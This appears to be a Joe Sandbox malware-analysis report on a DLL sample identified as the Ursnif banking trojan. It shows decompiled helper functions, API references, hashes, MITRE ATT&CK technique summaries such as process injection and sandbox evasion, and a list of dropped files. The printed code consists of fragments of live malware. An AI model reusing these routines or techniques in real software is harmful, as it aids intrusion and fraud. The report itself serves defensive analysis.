Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: f33f201deff422e9fe8e987983b10a68c1431cde849a51111e353c541d740ae2
Instruction ID: d77573f21dfe604d4844c878e53d579e6ab55e9d3a2b6656375afcdaaa170a3c
Opcode Fuzzy Hash: f33f201deff422e9fe8e987983b10a68c1431cde849a51111e353c541d740ae2
Instruction Fuzzy Hash: 1D214475900609EFDF11DFA9C9889DEBBB4FF48314B1041AAE945E7300EB70EA45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 044B4162 Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E044B4162(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x44ba2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x44ba2f0; // 0xc1be758d
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x44ba2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x044b416a
0x044b416d
0x044b4173
0x044b418b
0x044b418d
0x044b4192
0x044b4194
0x044b4197
0x044b4199
0x044b419c
0x044b419e
0x044b419e
0x044b41a0
0x044b41ab
0x044b41b0
0x044b41c1
0x044b41c9
0x044b41ce
0x044b41d1
0x044b41d4
0x044b41d6
0x044b41d9
0x044b41dc
0x044b41dc
0x044b41df
0x044b41ea
0x044b41ef
0x044b41f9

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,044B1DC6,00000000,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B416D
RtlAllocateHeap.NTDLL(00000000,?), ref: 044B4185
memcpy.NTDLL(00000000,04E695B0,-00000008,?,?,?,044B1DC6,00000000,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B41C9
memcpy.NTDLL(00000001,04E695B0,00000001,044B58D7,00000000,04E695B0), ref: 044B41EA

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 313a343f2e9cca01ca32d190b9c3ba418e0ccdde02db659ece831dfe59480317
Instruction ID: 1e4ba1ff02b1732cda6efe91a657213d4a2b3241c6395d0b01d4585d7b3b0ced
Opcode Fuzzy Hash: 313a343f2e9cca01ca32d190b9c3ba418e0ccdde02db659ece831dfe59480317
Instruction Fuzzy Hash: AB1106B2A00215BFEB148F69DC88D9ABFAEEB90261B050176F54497341E775AE0487E0

Uniqueness

Uniqueness Score: -1.00%

Function 044B227F Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B227F(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x044b2289
0x044b228d
0x044b22a2
0x044b22a4
0x044b22a9
0x044b22af
0x044b22b1
0x044b22b6
0x044b22c1
0x044b22b8
0x044b22b8
0x044b22b8
0x044b22b6
0x044b22cf

APIs

memset.NTDLL ref: 044B228D
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76DC81D0,00000000,00000000), ref: 044B22A2
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 044B22AF
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,044B593D,00000000,?), ref: 044B22C1

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 7c6237e2debd12e0dc9ef8b3c1696efa5c66ffd929ed6bac7755470f3d9f48b5
Instruction ID: b4b1ff2406077f897e6e02732e21231d966edb1deb5c889be5154116bb3df961
Opcode Fuzzy Hash: 7c6237e2debd12e0dc9ef8b3c1696efa5c66ffd929ed6bac7755470f3d9f48b5
Instruction Fuzzy Hash: 3BF054F15047087FD7206F66DCC4C67FBACEB41198B114D6EF18692201D675B8054AB0

Uniqueness

Uniqueness Score: -1.00%

Function 044B7607 Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B7607() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x44ba30c; // 0x2cc
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x44ba35c; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x44ba30c; // 0x2cc
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x44ba2d8; // 0x4a70000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x044b7607
0x044b760e
0x044b7658
0x044b765a
0x044b765a
0x044b7612
0x044b7618
0x044b761d
0x044b7621
0x044b7627
0x044b762e
0x00000000
0x00000000
0x044b7630
0x044b7635
0x00000000
0x00000000
0x00000000
0x044b7635
0x044b7637
0x044b763f
0x044b7642
0x044b7642
0x044b7648
0x044b764f
0x044b7652
0x044b7652
0x00000000

APIs

SetEvent.KERNEL32(000002CC,00000001,044B5E70), ref: 044B7612
SleepEx.KERNEL32(00000064,00000001), ref: 044B7621
CloseHandle.KERNEL32(000002CC), ref: 044B7642
HeapDestroy.KERNEL32(04A70000), ref: 044B7652

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: a88efa1f0903ad821b4e4b39f0cf2fe7f1b9fa1f5030a85f3a1abae80dc1b22f
Instruction ID: 37acb15a7809b4bebdd057984a7ff988cc16a55727e6aed3b8abbb014aaaafdd
Opcode Fuzzy Hash: a88efa1f0903ad821b4e4b39f0cf2fe7f1b9fa1f5030a85f3a1abae80dc1b22f
Instruction Fuzzy Hash: 4CF0F8B1A4171297EB206B3D9848A8337A8EB54761B090512BA40E2381CB28EC4496E0

Uniqueness

Uniqueness Score: -1.00%

Function 044B72C7 Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E044B72C7() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x44ba3cc; // 0x4e695b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x44ba3cc; // 0x4e695b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x44ba3cc; // 0x4e695b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x44bb827) {
					HeapFree( *0x44ba2d8, 0, _t10);
					_t7 =  *0x44ba3cc; // 0x4e695b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x044b72c7
0x044b72d0
0x044b72e0
0x044b72e0
0x044b72e5
0x044b72ea
0x00000000
0x00000000
0x044b72da
0x044b72da
0x044b72ec
0x044b72f1
0x044b72f5
0x044b7308
0x044b730e
0x044b730e
0x044b7317
0x044b7319
0x044b731d
0x044b7323

APIs

RtlEnterCriticalSection.NTDLL(04E69570), ref: 044B72D0
Sleep.KERNEL32(0000000A), ref: 044B72DA
HeapFree.KERNEL32(00000000), ref: 044B7308
RtlLeaveCriticalSection.NTDLL(04E69570), ref: 044B731D

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 26a7c5f485129e7e53edd5418bcd74f830a1d5a50795f0a8cd5ae343d2798f98
Instruction ID: cb2cacaaa165c9457aff500d6b53ae054bcdccaab77da881628374cca9464415
Opcode Fuzzy Hash: 26a7c5f485129e7e53edd5418bcd74f830a1d5a50795f0a8cd5ae343d2798f98
Instruction Fuzzy Hash: 61F0DAB42007019BFB188F54D889B6677A5EB84340B045415FA42E7390DA38BC11DAA4

Uniqueness

Uniqueness Score: -1.00%

Function 044B45C4 Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E044B45C4(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E044B6D63(_t2);
				if(_t34 != 0) {
					_t30 = E044B6D63(_t28);
					if(_t30 == 0) {
						E044B6C2C(_t34);
					} else {
						_t39 = _a4;
						_t22 = E044B7A57(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E044B7A57(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x044b45c4
0x044b45ce
0x044b45d0
0x044b45d6
0x044b45d6
0x044b45df
0x044b45e3
0x044b45ef
0x044b45f3
0x044b4667
0x044b45f5
0x044b45f5
0x044b45f9
0x044b45fe
0x044b4603
0x044b461d
0x044b460c
0x044b460c
0x044b4610
0x044b4613
0x044b4618
0x044b4618
0x044b4622
0x044b464a
0x044b4650
0x044b4653
0x044b4624
0x044b4626
0x044b462e
0x044b4639
0x044b463e
0x044b463e
0x044b465a
0x044b4661
0x044b4662
0x044b4662
0x044b45f3
0x044b4672

APIs

lstrlen.KERNEL32(00000000,00000008,?,76D84D40,?,?,044B6973,?,?,?,?,00000102,044B37A0,?,?,76DC81D0), ref: 044B45D0

Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F

Part of subcall function 044B7A57: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,044B45FE,00000000,00000001,00000001,?,?,044B6973,?,?,?,?,00000102), ref: 044B7A65
Part of subcall function 044B7A57: StrChrA.SHLWAPI(?,0000003F,?,?,044B6973,?,?,?,?,00000102,044B37A0,?,?,76DC81D0,00000000), ref: 044B7A6F

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,044B6973,?,?,?,?,00000102,044B37A0,?), ref: 044B462E
lstrcpy.KERNEL32(00000000,00000000), ref: 044B463E
lstrcpy.KERNEL32(00000000,00000000), ref: 044B464A

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: ec6f8d4bd5523991d7e3409c20af29b91722dc6ec1f28c87eba4f16a96038368
Instruction ID: 80353cede0a84a26224b18f10ae6b126c66f4ae5d76fe7f580e4a861825586b6
Opcode Fuzzy Hash: ec6f8d4bd5523991d7e3409c20af29b91722dc6ec1f28c87eba4f16a96038368
Instruction Fuzzy Hash: CC21A272504255EBDF125F79C884EEB7FB8EF46294F054056F9859B202E639E901CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 044B28C4 Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B28C4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E044B6D63(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x044b28d9
0x044b28dd
0x044b28e7
0x044b28ec
0x044b28f1
0x044b28f3
0x044b28fb
0x044b2900
0x044b290e
0x044b2913
0x044b291d

APIs

lstrlenW.KERNEL32(004F0053,?,76D85520,00000008,04E693F4,?,044B21EB,004F0053,04E693F4,?,?,?,?,?,?,044B66BE), ref: 044B28D4
lstrlenW.KERNEL32(044B21EB,?,044B21EB,004F0053,04E693F4,?,?,?,?,?,?,044B66BE), ref: 044B28DB

Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F

memcpy.NTDLL(00000000,004F0053,76D869A0,?,?,044B21EB,004F0053,04E693F4,?,?,?,?,?,?,044B66BE), ref: 044B28FB
memcpy.NTDLL(76D869A0,044B21EB,00000002,00000000,004F0053,76D869A0,?,?,044B21EB,004F0053,04E693F4), ref: 044B290E

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 875d1f0e13a532733b8186df25564508e43777a13e997f4467e025c81451185e
Instruction ID: e8a58b7b4ca9748fc3f1675a5709b55d994b99607be53ad7415e85f3a0f2404c
Opcode Fuzzy Hash: 875d1f0e13a532733b8186df25564508e43777a13e997f4467e025c81451185e
Instruction Fuzzy Hash: 99F0F976900119BB9F11EFAACC84CDF7BACEF092587164067ED08D7206E675EA149BF0

Uniqueness

Uniqueness Score: -1.00%

Function 044B393C Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(04E69B68,00000000,00000000,00000000,044B5902,00000000), ref: 044B394C
lstrlen.KERNEL32(?), ref: 044B3954

Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F

lstrcpy.KERNEL32(00000000,04E69B68), ref: 044B3968
lstrcat.KERNEL32(00000000,?), ref: 044B3973

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 2cf56fe40993678f205bf0b228240159824c8028c52bc53080a5b56660fa79ea
Instruction ID: db561b1d81a549188975f0a6f9264609eac1d2495db7ca3403496ce45a48b6d2
Opcode Fuzzy Hash: 2cf56fe40993678f205bf0b228240159824c8028c52bc53080a5b56660fa79ea
Instruction Fuzzy Hash: 0EE01273905A21A797115BA5AC48C9BBBADEF89761705041BFB00D3110C7699C05CBE1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 62835e34e60c1.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_99e41d792528612ced890929ed2335749e1b7_7cac0383_1936fee1\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_cb7b105113bf417cfd7547dda3de839a49ae23_7cac0383_1942d7b1\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_e912ab21695e486193197883960c42688442ed7_7cac0383_1836ecd0\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1D5.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD4C4.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD67B.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE01E.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE33B.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE465.tmp.xml

